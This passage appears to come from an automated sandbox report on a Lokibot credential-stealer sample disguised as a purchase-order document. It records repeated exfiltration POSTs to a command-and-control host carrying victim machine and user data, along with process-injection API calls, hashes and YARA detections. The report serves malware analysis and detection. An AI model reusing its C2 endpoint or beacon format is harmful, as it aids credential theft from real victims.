Sep 25, 2024 10:21:03.199822903 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gx99izGIh%2FhPUSzQ%2Fjm5sfY78Uczy4Fz6Lf1JzgS%2BQac3yxT9%2FOGEOIyHNzpwNiD4JKyCwQny9KKaOXuGeX2qBeFPEcSvMXLDdPolbOB77E1inf5LPUPjYz4Gpgp9g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8999354f96c466-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.7	49833	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:03.366055012 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:03.370904922 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:04.014822960 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jF2zcAi9NSmA7H3dAbBS6rU3%2BkgNWuFeoUW0k%2BWdj05gubJbynp1jf0jislSiM6aHZPw3pte2MIYWRVvmSEf7HZIYtbozA0pVOJduwF09%2FgLu4kzz9svG67tYfmolQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89993a8ff89e05-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.7	49834	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:04.488882065 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:04.493818045 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:05.131498098 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sd027RfBO%2Bcqegf6S%2BUUDd3WfjlqnPGlWJqTSvrIgLryM73VDDSQQ5S%2BkfiCtolVtgTV7cNIe5JVTZESnvhSm%2BL75y6e9%2BnLgGczxDj0ZLUa6V0e2OfFnHTNBN6c7A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8999418e6a443e-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.7	49835	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:05.268106937 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:05.272945881 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:05.949707985 CEST	597	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BwDBx0OK%2BRQJl9nrYcEhkc7BTzDUiSeiQN3VRYoAZK7uY3VGbOSOn2%2B%2FZWpu0rFDTBgYgxD32emXo6nTjV7hz5i1wnxjWYCV7PJEyMhydln1C0ly8Gpd3ePZ5bHFQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8999467c8a41e0-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.7	49836	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:06.096287012 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:06.101213932 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:06.745244026 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDxjuXrvZUxpxuejXKzBOrxjdTX1QpUxXi6abbGz8YhcvWFocTa%2FgBNUKV5gcDTRix75MDTDD%2BY%2Bk5iXku76DeP0UGCp18kgGQmMFufdM5NQS8xT2xNX4EEiyo5ODQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89994b9c0e0f45-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.7	49837	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:06.894697905 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:06.901424885 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:07.563296080 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k4jcox0invbQ3ydcBcLmK7s%2FnQZpXOrimvFowBTIPwZO2tcOhf7m%2Bs6Q%2F9rbvWUWNjmrkJO%2BpLvXFNLUC9Rr5ZnX%2Fum4vQFgcZebIrZ52CnRqeF5BdR1T706%2BC8A3w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8999509e1d7d00-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.7	49838	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:07.851252079 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:07.859251022 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:08.545244932 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kDcElRujfFU27a2MSEyRLrCXsYnSVPMvJY%2BXltO4vZbvO7W%2Fw5HO%2FS%2FMqBmgEIRf2SJsyd1zQTe%2FMIys%2Bs6sLmEol3wBvcEryW9Tk16gBmb8LUaYGC0QKXnIa3PjsA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899956add0c413-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.7	49839	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:09.936089039 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:09.943417072 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:10.666544914 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y53BXyOf9asEuqVE6J%2FMQ3XO%2FKsdUDDHI8UlJSP7cN1yjAbpntEtz1TSYTVoYxrtH2qJ1F751bdWCsXAGqclNloJ21BV683TVNkZNNEg2JBDnaJPWAx%2Bz8jANvN9nQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899963afd28c99-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.7	49840	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:10.813240051 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:10.818080902 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:11.512902975 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4qwXGPoU5sTtXbjCZkY8QdIYtL2TYr1Hb1pVF8qz0lRzW52Qfct0LvFZUxbdYYWfZ%2F3jltHllV9R%2F7QQajJZDUZ3ZmUPxIG%2FAXn8Q3IKuH8nrq6l49CEIpbO7tTEoQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8999692a387c96-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.7	49841	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:11.669521093 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:11.674439907 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:12.356112957 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F6MPIsfFruZUhXYken8dVVxkrQSldtml8W3lYv63eRu%2Bwzocz6AQ8xEHTpRnEskMtEYqnVrwDRqgcY7GopvuO%2Bnnkk8rhH1%2Bku3lxqENKGORfKdhi1EtJuhbYjZf9A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89996e6d718c8a-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.7	49842	188.114.97.3	80

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:12.566299915 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:12.571147919 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:13.248045921 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKihcROsUu%2FMWQYq23ZOZZHOwdkBYi2BW%2FeoduepUa05Ad68Xoaa8QYaqxouPQGRqSDt%2BlRUP1ApI5B183MAyxbNnRLYDyCVjLo9ZwsauJDMUMaPYTqMn8Z2If5ZPg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8999740fe617d9-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	04:19:05
Start date:	25/09/2024
Path:	C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe"
Imagebase:	0xbd0000
File size:	208'896 bytes
MD5 hash:	AA2EDBA076823E2D67C52D3055A15E80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:19:06
Start date:	25/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x6e0000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	27%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	35
Total number of Limit Nodes:	2

Executed Functions

Function 017454F7 Relevance: 1.7, APIs: 1, Instructions: 238
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 017456DF

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 55d2560381d2e1d6f4582f905c24591f663ac510c2198df648d562be53ff107b
Instruction ID: 558d74d5faeb4b1be5e70b7ce78bdfaad676e1cb697d167f4fad404fe9559bcd
Opcode Fuzzy Hash: 55d2560381d2e1d6f4582f905c24591f663ac510c2198df648d562be53ff107b
Instruction Fuzzy Hash: C681CF75C0026DDFDB25CFA9D940BEDBBF1AB09300F0094AAE548B7260DB749A85CF94

Function 01745500 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 017456DF

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 37943e72e4726ab4dcd519cdee017fe40f3884b1ece6e515d710122b8c1ae4e1
Instruction ID: a4f181dd111c5ab40d00380f8af348bebeb0f2c30d0379be60a68ec758318da0
Opcode Fuzzy Hash: 37943e72e4726ab4dcd519cdee017fe40f3884b1ece6e515d710122b8c1ae4e1
Instruction Fuzzy Hash: D181BF75D0026DDFDB25CFA9D980BDDBBF1AB09300F0094AAE548B7260DB749A85CF94

Function 01745B60 Relevance: 1.6, APIs: 1, Instructions: 117
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01745C36

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 50f9bd02b69713ef4eac27c9886e23a9a2c14c6b1398ff3c6037e29ea32d17bc
Instruction ID: 1285e0736cc2cac117e14671ac55b2e0173144f1d486e431c92b8ac8194f0560
Opcode Fuzzy Hash: 50f9bd02b69713ef4eac27c9886e23a9a2c14c6b1398ff3c6037e29ea32d17bc
Instruction Fuzzy Hash: 5741A9B5D04259DFCB10CFA9D984ADEFBF1AB09310F24906AE814BB250D335AA45CF68

Function 01745B68 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01745C36

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 12c030ac461fc967cea7726517a98fca78dd06bd6ae7adc068b66b4b10eb9aa0
Instruction ID: dfc68bfdb35fedece1a1f92bbb046fe2b7f0903467f2dcda12ec9459fbc43904
Opcode Fuzzy Hash: 12c030ac461fc967cea7726517a98fca78dd06bd6ae7adc068b66b4b10eb9aa0
Instruction Fuzzy Hash: 314168B9D042599FDB10CFA9D984ADEFBF1BB09310F24902AE918B7310D375AA45CF64

Function 01745941 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 017459F5

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a213e41b820efb770fd02787e2bb04bd92d67161eca7ea03d04341aae952294a
Instruction ID: 54132769281446c44a321f6a3fc328cb525178f367dec48f00f8c4d686a251ee
